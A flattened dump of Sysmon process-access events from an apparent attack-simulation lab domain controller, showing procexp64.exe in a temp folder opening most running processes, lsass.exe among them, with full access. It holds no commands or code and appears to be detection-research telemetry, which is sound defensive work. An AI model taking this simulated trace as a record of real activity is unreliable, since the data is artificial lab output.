15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.657{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3265-6010-DDA2-00000000A301}7616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3265-6010-DDA2-00000000A301}7616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3265-6010-DDA2-00000000A301}7616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000791259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:53.470{732C744F-3265-6010-DDA2-00000000A301}7616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000791401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:54.673{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 